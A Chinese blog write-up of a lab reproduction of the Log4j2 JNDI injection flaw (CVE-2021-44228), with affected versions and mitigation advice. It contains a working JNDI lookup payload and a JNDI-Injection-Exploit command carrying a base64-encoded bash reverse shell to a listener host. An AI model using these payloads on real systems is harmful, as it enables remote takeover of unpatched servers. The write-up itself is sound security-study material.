漏洞原理
该漏洞是由于,在JNDI客户端的lookup()函数参数外部可控或Reference类构造方法的classFactoryLocation参数外部可控时,会使用户的JNDI客户端访问RMI注册表中绑定的恶意Reference类,从而加载远程服务器上的恶意class文件在客户端本地执行,最终实现JNDI注入攻击导致远程代码执行。
漏洞影响范围
2.0 <= Apache Log4j2<= 2.14.1
漏洞复现过程
启动服务后,进入主页面,点击页面中的???链接,跳转到,目标地址。
首先使用dnslog进行测试,是否存在jndi注入的点,再ceyedns平台接收到了反馈的消息,发现此处存在jndi注入。
payload=${jndi:ldap://dnslog地址/}并将其进行url转码。
如果payload没有进行url编码,可能会导致后台无法解析,最好的方式就是将payload全部进行url编码。(这一块之所以需要编码,可能是环境的问题)
下面为了获取shell反弹,需要先进行bash指令base64编码。
base64转码地址:https://ares-x.com/tools/runtime-exec
使用jndi注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 。
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUuMTI5LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.5.129
此处我选择的是Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath)的结果。
在此处可以发现,首先通过rmi远程监听,接收到远程调用后,将其转发至payload地址,调用exp。
成功getshell。
我采用的是较为简单便捷的方法进行复现,全程只是使用了JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具,另外,还可以使用ysoserial-0.0.6-SNAPSHOT-all.jar以及marshalsec-0.0.3-SNAPSHOT-all.jar。可以使用marshalsec-0.0.3-SNAPSHOT-all.jar进行rmi监听,使用ysoserial生成poc。
漏洞修复建议
及时升级log4j组件。
临时建议
添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true
在应用classpath下添加log4j2.component.properties配置文件,文件内容为 log4j2.formatMsgNoLookups=true
JDK使用11.0.1、8u191、7u201、6u211及以上的高版本
部署使用第三方防火墙产品进行安全防护。文章来源:https://www.toymoban.com/news/detail-440463.html
参考链接
Log4j2漏洞环境搭建及复现:http://www.plumstar.cn/2022/11/14/Apache%20Log4j2%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA%E5%8F%8A%E5%A4%8D%E7%8E%B0/
Log4j2漏洞原理、复现与利用:https://www.cnblogs.com/hellobao/articles/17249334.html
CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现:https://blog.csdn.net/weixin_44309905/article/details/122316579文章来源地址https://www.toymoban.com/news/detail-440463.html
到了这里,关于Log4j2远程命令执行(CVE-2021-44228)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
![[CVE-2021-44228]:log4j2漏洞学习与复现流程详解(vulhub环境)](https://imgs.yssmx.com/Uploads/2024/02/473196-1.png)
